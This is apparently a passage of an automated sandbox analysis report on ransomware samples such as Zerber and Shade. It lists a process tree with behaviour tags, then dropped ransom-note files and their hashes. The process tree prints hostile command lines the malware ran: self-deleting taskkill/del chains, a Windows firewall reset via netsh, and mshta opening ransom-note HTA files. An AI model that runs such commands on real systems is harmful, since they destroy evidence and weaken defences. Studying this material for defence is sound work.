                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe
                                                                                                              Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:848
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe" > NUL
                                                                                                                3⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                PID:1292
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                /d /c taskkill /t /f /im "Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe" > NUL & ping -n 1 127.0.0.1 > NUL & del "C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.dfl-fa331de6fa0aad4e5a9374f8270ddaf40822141a01f43f3b1ac690348866edf6.exe" > NUL
                                                                                                                3⤵
                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                PID:4852
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.eizz-fc57639892d5b3e34b25e977ea48aecd405fb6aa88b0a778234b88975e887764.exe
                                                                                                              Trojan-Ransom.Win32.Zerber.eizz-fc57639892d5b3e34b25e977ea48aecd405fb6aa88b0a778234b88975e887764.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:1296
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.ejda-1a555b67c20881e26b7d28c63719d28d9068eb5486c8439dc2665c39ee73f11e.exe
                                                                                                              Trojan-Ransom.Win32.Zerber.ejda-1a555b67c20881e26b7d28c63719d28d9068eb5486c8439dc2665c39ee73f11e.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              PID:1536
                                                                                                            • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.ejgi-1ce3d05a944b51bc86dc790a5ec460603aefa5cf6fb15be79607cd70d3cfa8d9.exe
                                                                                                              Trojan-Ransom.Win32.Zerber.ejgi-1ce3d05a944b51bc86dc790a5ec460603aefa5cf6fb15be79607cd70d3cfa8d9.exe
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Enumerates connected drives
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                              • Suspicious use of UnmapMainImage
                                                                                                              PID:2004
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
                                                                                                                3⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                PID:3568
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                C:\Windows\system32\netsh.exe advfirewall reset
                                                                                                                3⤵
                                                                                                                • Modifies Windows Firewall
                                                                                                                PID:3420
                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___FWEY_.hta"
                                                                                                                3⤵
                                                                                                                  PID:5912
                                                                                                                • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WRWZUCI_.txt
                                                                                                                  3⤵
                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                  PID:5060
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /d /c taskkill /f /im "T" > NUL & ping -n 1 127.0.0.1 > NUL & del "C" > NUL && exit
                                                                                                                  3⤵
                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                  PID:5248
                                                                                                              • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.ejme-26e75d9d43807fc1ee756e6a7e65dbb95be4a17fd466f2515e842518ca071c5d.exe
                                                                                                                Trojan-Ransom.Win32.Zerber.ejme-26e75d9d43807fc1ee756e6a7e65dbb95be4a17fd466f2515e842518ca071c5d.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                PID:1168
                                                                                                              • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.flyi-4faeb2cddcae33547d9c14a4de7cbb80a6fe7ece9fd4ab6bc6bb8f61cf60e810.exe
                                                                                                                Trojan-Ransom.Win32.Zerber.flyi-4faeb2cddcae33547d9c14a4de7cbb80a6fe7ece9fd4ab6bc6bb8f61cf60e810.exe
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                PID:2192
                                                                                                                • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.flyi-4faeb2cddcae33547d9c14a4de7cbb80a6fe7ece9fd4ab6bc6bb8f61cf60e810.exe
                                                                                                                  Trojan-Ransom.Win32.Zerber.flyi-4faeb2cddcae33547d9c14a4de7cbb80a6fe7ece9fd4ab6bc6bb8f61cf60e810.exe
                                                                                                                  3⤵
                                                                                                                  • Drops startup file
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Sets desktop wallpaper using registry
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2080
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_VHF4_.hta"
                                                                                                                    4⤵
                                                                                                                      PID:5116
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe"
                                                                                                                      4⤵
                                                                                                                        PID:5908
                                                                                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.fpzt-4c4505fe5b831396043bfe126218bdda38f4207265f174b05b384c51754b841b.exe
                                                                                                                    Trojan-Ransom.Win32.Zerber.fpzt-4c4505fe5b831396043bfe126218bdda38f4207265f174b05b384c51754b841b.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                    PID:1444
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 88
                                                                                                                      3⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Program crash
                                                                                                                      PID:1020
                                                                                                                  • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.uvx-d118f581edc1311911ef0100789144c08e6af35c410f91f40585fc5a9c9fce97.exe
                                                                                                                    Trojan-Ransom.Win32.Zerber.uvx-d118f581edc1311911ef0100789144c08e6af35c410f91f40585fc5a9c9fce97.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:1452
                                                                                                                    • C:\Users\Admin\Desktop\00295\Trojan-Ransom.Win32.Zerber.uvx-d118f581edc1311911ef0100789144c08e6af35c410f91f40585fc5a9c9fce97.exe
                                                                                                                      Trojan-Ransom.Win32.Zerber.uvx-d118f581edc1311911ef0100789144c08e6af35c410f91f40585fc5a9c9fce97.exe
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2636
                                                                                                                  • C:\Users\Admin\Desktop\00295\UDS-Trojan-Ransom.Win32.Shade.gen-44f0b830bf98e5347414b1c9c4525e6a07e35743f25848f5900491dca8475947.exe
                                                                                                                    UDS-Trojan-Ransom.Win32.Shade.gen-44f0b830bf98e5347414b1c9c4525e6a07e35743f25848f5900491dca8475947.exe
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                    PID:924
                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                  PID:1512
                                                                                                                • C:\Windows\system32\vssvc.exe
                                                                                                                  C:\Windows\system32\vssvc.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:1232
                                                                                                                • C:\Windows\syswow64\svchost.exe
                                                                                                                  "C:\Windows\syswow64\svchost.exe"
                                                                                                                  1⤵
                                                                                                                  • Modifies WinLogon for persistence
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:3304
                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe "-496863605348264368-918403360-534084271-1372316973-7869444181855692596236327245"
                                                                                                                  1⤵
                                                                                                                    PID:2628
                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                                    1⤵
                                                                                                                      PID:3432
                                                                                                                    • C:\Windows\system32\AUDIODG.EXE
                                                                                                                      C:\Windows\system32\AUDIODG.EXE 0x48c
                                                                                                                      1⤵
                                                                                                                        PID:3448
                                                                                                                      • C:\Windows\Explorer.EXE
                                                                                                                        "C:\Windows\Explorer.EXE"
                                                                                                                        1⤵
                                                                                                                          PID:4636
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Install\Notepad.exe"
                                                                                                                            2⤵
                                                                                                                              PID:4920
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
                                                                                                                                C:\Users\Admin\AppData\Roaming\Install\Notepad.exe
                                                                                                                                3⤵
                                                                                                                                  PID:4536
                                                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HELP_RECOVER_instructions+rgb.txt
                                                                                                                                2⤵
                                                                                                                                  PID:2008
                                                                                                                                • C:\Windows\regedit.exe
                                                                                                                                  "C:\Windows\regedit.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Runs regedit.exe
                                                                                                                                  PID:3356
                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                  2⤵
                                                                                                                                    PID:1996
                                                                                                                                • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                  C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                  1⤵
                                                                                                                                    PID:5548
                                                                                                                                  • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                    1⤵
                                                                                                                                      PID:5000
                                                                                                                                    • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                      C:\Windows\SysWOW64\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}
                                                                                                                                      1⤵
                                                                                                                                        PID:6140

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RECOVER_instructions+rgb.html

                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        cbf38e1078a49bb6437aea9fef80cb1d

                                                                                                                                        SHA1

                                                                                                                                        f4718ddf3390e3ac24d271ffa04de1abd4d10626

                                                                                                                                        SHA256

                                                                                                                                        4f627037da4bacf34f1ea8557d7c974ddf8ff5de54e6d968c09ba663bc964881

                                                                                                                                        SHA512

                                                                                                                                        11d2c935996618e6ff2aaef1e8d2da56d704d647621657dff8dc73954302169dc1b33fb561b6c06145816e3d6e6806678224758ec541b906f8338ed3b05e0626

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\HELP_RECOVER_instructions+rgb.txt

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        786aff37d716cb1c425f895c0d099923

                                                                                                                                        SHA1

                                                                                                                                        6569f06245ad5028fe1414186a475381c00eaba2

                                                                                                                                        SHA256

                                                                                                                                        1732774fe35e7228aff34eba5b0f424a47982b7ce33111e914009e45cc6438d1

                                                                                                                                        SHA512

                                                                                                                                        84403f8adee80d0a699241765534ca1519f17c9bd843649b71f2314faa56c9338d8bfdd91efc8431099697ec9733cd5103dae243374449ee1ecbb4d03d4e634e

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+tvgdx.html

                                                                                                                                        Filesize

                                                                                                                                        9KB

                                                                                                                                        MD5

                                                                                                                                        53b22777b0d14af3c1dcfa35bc22cba8

                                                                                                                                        SHA1

                                                                                                                                        6bd22983e6b1ab000c22377db9cb52a0e101e35f

                                                                                                                                        SHA256

                                                                                                                                        e0f6d8d4152fe48b2106c89455f679fc7b596032ca02a9d4929d19daa1d50605

                                                                                                                                        SHA512

                                                                                                                                        e7d65f2b4e86c867222b83988a2e133af7506e7a09a58263d97da72fe53ee310d0a7fb3f5ab64668c0b60e4b4499a812e0cc657eba96df397fed2bb903b7358b

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+tvgdx.png

                                                                                                                                        Filesize

                                                                                                                                        67KB

                                                                                                                                        MD5

                                                                                                                                        d4908e660d8470ec52560b29dc844efa

                                                                                                                                        SHA1

                                                                                                                                        a7a7b3292dfb932e689f03b4735294f68e64174d

                                                                                                                                        SHA256

                                                                                                                                        18b3da980fc7458932600602aed71b0cb59de3cf191e9973faf57d40c366c1fc

                                                                                                                                        SHA512

                                                                                                                                        7f237d13a31ec17c50d6b6d3ff787cd9f9df06864266a5ed2b8846bed8d0ac94a662db47c931339a0f3048035988ec19aa6e86b15791ff3f3e8be2c0f955150b

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\Recovery+tvgdx.txt

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        6159ba87c80e314b51e19406584ce3f2

                                                                                                                                        SHA1

                                                                                                                                        508ca7e16fa70fd27093e61943a3954e46547560

                                                                                                                                        SHA256

                                                                                                                                        b15f4404e3cf60c2750ed57a1a21a06313fca0c62f2d7db76f55cb5979e53206

                                                                                                                                        SHA512

                                                                                                                                        9fdfbea7560f112781b9f2a578ead09a6cd395d1aba27678dc14bfa2bb67db4571781dc2754d536d1c63eb593bff6fbe637517d468e5d6e788c7e806aaed91ee

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+fmhad.html

                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        fb2109197f59d5aca1ab4407dc58af53

                                                                                                                                        SHA1

                                                                                                                                        38814ec0893454967068a6bd34666a9755229d9a

                                                                                                                                        SHA256

                                                                                                                                        97a86e5f0cbb78f62c680e248bdb68733e2c642e714408f7c8c3b5256d279042

                                                                                                                                        SHA512

                                                                                                                                        ca3e726c43181543906a6a24b4d8d48f00a0b9629b74d4a2d6444f2059c01385b1942a1e8dbf916f266ff95806f4034658b654231cd23c727e620553512b3279

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+fmhad.png

                                                                                                                                        Filesize

                                                                                                                                        63KB

                                                                                                                                        MD5

                                                                                                                                        fe4ffcfeeadb100e4d90c42f91ad1fe9

                                                                                                                                        SHA1

                                                                                                                                        e2263bdcba64851ab7374da3b522dabf545e05cf

                                                                                                                                        SHA256

                                                                                                                                        af67fb1b91311e808c950d0e4e8f71eaf7067d4d18cd2b58576186a2f0826f1f

                                                                                                                                        SHA512

                                                                                                                                        5083b73412a1bccd3e9e77b832c303faa921903fc706939b1a1db16a44bb21385c10798ef530fe0526c4dd91cb2cfd6c2cbe0703c341c74b207a675b639c7191

                                                                                                                                      • C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\_ReCoVeRy_+fmhad.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        69cceccbd57224b5b6dd4be95f5a7c74

                                                                                                                                        SHA1

                                                                                                                                        934886d84f611e3d7d09a7b9a17103e090c1676b

                                                                                                                                        SHA256

                                                                                                                                        70037318b940778b9b2591fd37f9bcf3225dd93c46cf61ea344de08e817cf267

                                                                                                                                        SHA512

                                                                                                                                        fd2d2fb69c039cb226b77d4e7b3421bc7bc7f40f6d9ea2a7957a2f3ebf6a14f5a36163b2d9bda0cfc7624de8bef472c22b56d5e31f76b7d32e17e2fb5d0be6cb

                                                                                                                                      • C:\PerfLogs\HELP_RECOVER_instructions+rgb.html

                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        713e2014aebb69b39f02738fe7bc0f06

                                                                                                                                        SHA1

                                                                                                                                        663d6d5b48c81c39b987be17f3aea20270997650

                                                                                                                                        SHA256

                                                                                                                                        11a5d0d4bd32b9b928081312544c3c264e0bba33a4eb2d3b94711b9e7cf66217

                                                                                                                                        SHA512

                                                                                                                                        d59212fabcbd9451a80cf3a9d87312344033c0e958efbfafbd35815af65f44b83d7ee854c98495fc5ead70356988211f986619550240990d0ece6faa94f3a18d

                                                                                                                                      • C:\PerfLogs\HELP_RECOVER_instructions+rgb.txt

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        35462a5ef7e498a944b26220ea9f2a7d

                                                                                                                                        SHA1

                                                                                                                                        61257db0a8d6ddb0ed3de76b4062d2ff435792ec

                                                                                                                                        SHA256

                                                                                                                                        4ad25b0911bed96830e6fcf2788106f286b10ff9ae637fae359c13ef82463fe5

                                                                                                                                        SHA512

                                                                                                                                        aaf7d4201bd62d8ebe30cd9beb0812aa5a352cd5ae64fd1bbe6eb62f4696f7927b6cf7bb062a122892ba526e12fb94f81296072f024d7fd9284dd8f6790e242d

                                                                                                                                      • C:\PerfLogs\Recovery+tvgdx.html

                                                                                                                                        Filesize

                                                                                                                                        9KB

                                                                                                                                        MD5

                                                                                                                                        0e9865736e5b0d2d2e760d6bd0e7d6ea

                                                                                                                                        SHA1

                                                                                                                                        9588845cf5b7d4c6c1033bfb52a4aa5b4a50c235

                                                                                                                                        SHA256

                                                                                                                                        af3a1b7ca52c4025a6c115cd1949c1b20d0859a268a3c004672af5a55ebdb969

                                                                                                                                        SHA512

                                                                                                                                        656ec14639759873798d1971a43712f2e53670b4aa6c1bb9611ae3b687b42cf2289523bd273577cb75e6e0ba94c7535428970af8890a6943378f9335de0c3bf6

                                                                                                                                      • C:\PerfLogs\Recovery+tvgdx.png

                                                                                                                                        Filesize

                                                                                                                                        67KB

                                                                                                                                        MD5

                                                                                                                                        8d93f6eecc8776ed9b95515f572955e6

                                                                                                                                        SHA1

                                                                                                                                        4bbd9b3a68138eda9b053a647652696c76cc8285

                                                                                                                                        SHA256

                                                                                                                                        b564d199b1cadcaff3a3ff6f9cbdf22f40f92399aaa0707297fea57ec13eb636

                                                                                                                                        SHA512

                                                                                                                                        99211431e0bc2e0212117ec7acb72d51b79b143601451feccfead9178dce836a3061a6bf205dfe4dd4ffb0324342d1558fbbc0fa2314b6852227cc5d6b78ce51

                                                                                                                                      • C:\PerfLogs\Recovery+tvgdx.txt

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        e17c5b0c040fbcdc0ddd68e26a49b493

                                                                                                                                        SHA1

                                                                                                                                        d9137e8bb855dbaa061e66852b47f4d4777fe68e

                                                                                                                                        SHA256

                                                                                                                                        02d21c45d3b9dd520fa81376b43e5b494affe53f414942cdeeba10a8f59d266e

                                                                                                                                        SHA512

                                                                                                                                        6f4621f98e93529d12c55f3294809d826cd7dd516634776fa3c8dc776e5c100d259ddff53eec01b743c4ca67782f30125a23d1c4fb979c45e7420124d8e50513

                                                                                                                                      • C:\PerfLogs\_ReCoVeRy_+fmhad.html

                                                                                                                                        Filesize

                                                                                                                                        12KB

                                                                                                                                        MD5

                                                                                                                                        f413554dc2de618f1360e0815ad7005b

                                                                                                                                        SHA1

                                                                                                                                        030911a3eb4ad77c8fa21bb316856beeb0daf313

                                                                                                                                        SHA256

                                                                                                                                        71db282bccff5c4ea94da602e961a2101dcbed7f41e9ddd12cd00c30b0fffbfa

                                                                                                                                        SHA512

                                                                                                                                        30a8b9befcc99f0f96ab01ed69d4ff97046fcea571d4c19fcc4558ecd6b431d9eeaaee360350cad53d023d14067e19f9b08f3cc06cc2f33aa39e480dfdf27c00

                                                                                                                                      • C:\PerfLogs\_ReCoVeRy_+fmhad.png

                                                                                                                                        Filesize

                                                                                                                                        63KB

                                                                                                                                        MD5

                                                                                                                                        82f7d09c62de1bfc223190f1aa76bfed

                                                                                                                                        SHA1

                                                                                                                                        d59ca9458d926b7dc87da3c4cb7f5501ab9ce5c9

                                                                                                                                        SHA256

                                                                                                                                        4ebbfa5d1145b4f507d83f216d1b53ec8252396cb767446746bf77f336beaf84

                                                                                                                                        SHA512

                                                                                                                                        e2b458a4accc89743596a0a5b4f0b77d572002e1d62d716f31972d2b25685bb9023ef1660ad8638e4ad065bb8200a1e4aaeb4e25d799c663030f8af5c98a47df

                                                                                                                                      • C:\PerfLogs\_ReCoVeRy_+fmhad.txt

                                                                                                                                        Filesize

                                                                                                                                        1KB

                                                                                                                                        MD5

                                                                                                                                        44869b4a13d969606274134d1213879f

                                                                                                                                        SHA1

                                                                                                                                        a959b0a606da7a2b46af7960d7e1f57843c3b3d2

                                                                                                                                        SHA256

                                                                                                                                        bbe314010e65830b529400e480d8b223358dff560826616510bc61b6ff70b224

                                                                                                                                        SHA512

                                                                                                                                        cc62d049972e102f6fe7530a51fdb4c92c515154544afc48fc5e502270e8c737812337e46fa01b0bd1a5a5582043af703f6d8fc0ab96381e2f8b212a7b45858a

                                                                                                                                      • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt

                                                                                                                                        Filesize

                                                                                                                                        11KB

                                                                                                                                        MD5

                                                                                                                                        590456bbb057a68b22caea13bb607afc

                                                                                                                                        SHA1

                                                                                                                                        4e31da47bfe1d27a04602ac5816e5d520fd39909

                                                                                                                                        SHA256

                                                                                                                                        28867b114ecd0fbea993f788fdd9e3b2824617cf66377e84ad49e773baf8e406

                                                                                                                                        SHA512

                                                                                                                                        96358b0c654c5f9d53f3e81cf357a4501ca4cf594f6671290ee9f070f0faa15018c38ead5d071e93c6496a28192c18ec2e67023b0943924789e5e2220a9fed14

                                                                                                                                      • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME-JAVAFX.txt

                                                                                                                                        Filesize

                                                                                                                                        109KB

                                                                                                                                        MD5

                                                                                                                                        f473df6ae555f7ced2ed79d2dc241f85

                                                                                                                                        SHA1

                                                                                                                                        87fad35d058c42295155879b084d555e42b6c6f9

                                                                                                                                        SHA256

                                                                                                                                        d2cec5c598828f0ab21f595ebeb51059b9dd03e3ae81db2eba0cee97a8486dcd

                                                                                                                                        SHA512

                                                                                                                                        0509f380500b4ec04f95c6eef8e20d449a2ded76ee823087e620992bc72cee96ffa913e38158916ae96aa1ebab7f9e142adff8ad704abcef94e18385be0fd1c0

                                                                                                                                      • C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt

                                                                                                                                        Filesize

                                                                                                                                        173KB

                                                                                                                                        MD5

                                                                                                                                        2b4d946fec26f5e10cd0dbd5095eb0b0

                                                                                                                                        SHA1

                                                                                                                                        690b0a75e911063323fdcbed9c1689c9bfdaf236

                                                                                                                                        SHA256

                                                                                                                                        49687a627b5f7581a7a5e09acf9cd238bf72a4b3ec1562104d4aa78c6dc5e35e

                                                                                                                                        SHA512

                                                                                                                                        e000400b9d8c9233dff4f2fd3354e4e71b52452a718cb688b67af03c28e37b7cabbe8b09dba0d46e2e029bced95b3133be8917edc35b0ba20113deebfe851aa6

                                                                                                                                      • C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\RECOVER-FILES..html

                                                                                                                                        Filesize

                                                                                                                                        4KB

                                                                                                                                        MD5

                                                                                                                                        2e2b23f2a5454568ccaeddd77743687e

                                                                                                                                        SHA1

                                                                                                                                        7abe9b3b132216e0c0072e32a244291a59791d72

                                                                                                                                        SHA256

                                                                                                                                        2d67595cc3466fb74bcb463eace3c75c570eaa5008e0038b72b8e6e46f636818

                                                                                                                                        SHA512

                                                                                                                                        b0e3f54388194c5134b68fa3568b168c29524a81c09d4bffbabf6800bbbbd9b8d67c34ac6671cd549876e415c43b98beefcf97849d7482854f076cf22e226870

                                                                                                                                      • C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MValidator.Lck

                                                                                                                                        Filesize

                                                                                                                                        16B

                                                                                                                                        MD5

                                                                                                                                        47d0158f27663bcddc533a76b57a8ece

                                                                                                                                        SHA1

                                                                                                                                        14062d8a73e45af6cc87794949edf1ab9e745b1b

                                                                                                                                        SHA256

                                                                                                                                        76a15bb76ab83df087d0f581e1585184e072b4aa1511da21690a4387d0463acb

                                                                                                                                        SHA512

                                                                                                                                        0d8e4f4a6b4c6cadb8108c9f46a90d0d76b8096510a024177ff1900447e987cffa9a9fe2cdd9ab1e37f99d92d3128242101f01a3e89d7f71ca6b4bef33cf726a

                                                                                                                                      • C:\ProgramData\Microsoft\MF\Pending.GRL

                                                                                                                                        Filesize

                                                                                                                                        14KB

                                                                                                                                        MD5

                                                                                                                                        3b475cbc7522c0488bc727c4fd589005

                                                                                                                                        SHA1

                                                                                                                                        8620ea16da99746971fbc437f75558daf69739db

                                                                                                                                        SHA256

                                                                                                                                        f418a2565e3267431f096bd7add3f8f07cb39d148e0a4cfebf2c3f9d01407565

                                                                                                                                        SHA512

                                                                                                                                        53a62d54838c46a0f097e4e69da5b061b855d740b7149acb65e3c051c0c4e8565bafb71a6ddbc66a4a185754a3b98109148a050c389500000a773500e6918bae

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        1051c0ac40b8d8a2377c084910f10435

                                                                                                                                        SHA1

                                                                                                                                        0640d4f33dee1750573acc2ef93bfe71818dc68c

                                                                                                                                        SHA256

                                                                                                                                        c60b0bb1e142a6f2a4f19f1e11b9d262cca1a8972a398ec839d8e26855e3933c

                                                                                                                                        SHA512

                                                                                                                                        8954f8d6c4117d9a0f5267c70e455453551e30850f2d2e4ba1d9bb8a1e88db17c180e3ba57f2c6192142ca226790d61a7569fa76a45234ef26b1f6a11cd1469d

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                        Filesize

                                                                                                                                        342B

                                                                                                                                        MD5

                                                                                                                                        33f9aba1f97721f049625dd0f00d36a2

                                                                                                                                        SHA1

                                                                                                                                        6b0fad18b2956535ce28376d1498640ad8a1d8c3

                                                                                                                                        SHA256

                                                                                                                                        f21859f3222e6c76adbfbd1bb3a7c4bc32ef291b5231bff0e2ea18b092df50cf

                                                                                                                                        SHA512

                                                                                                                                        761b8c11279ad721e17b084f414a7bc95d6dbd8ed4eac48409347c707b7670bb6006d61624129721bdeddf624b52b4533d110d6fe229253ec514d6878aa30768

                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

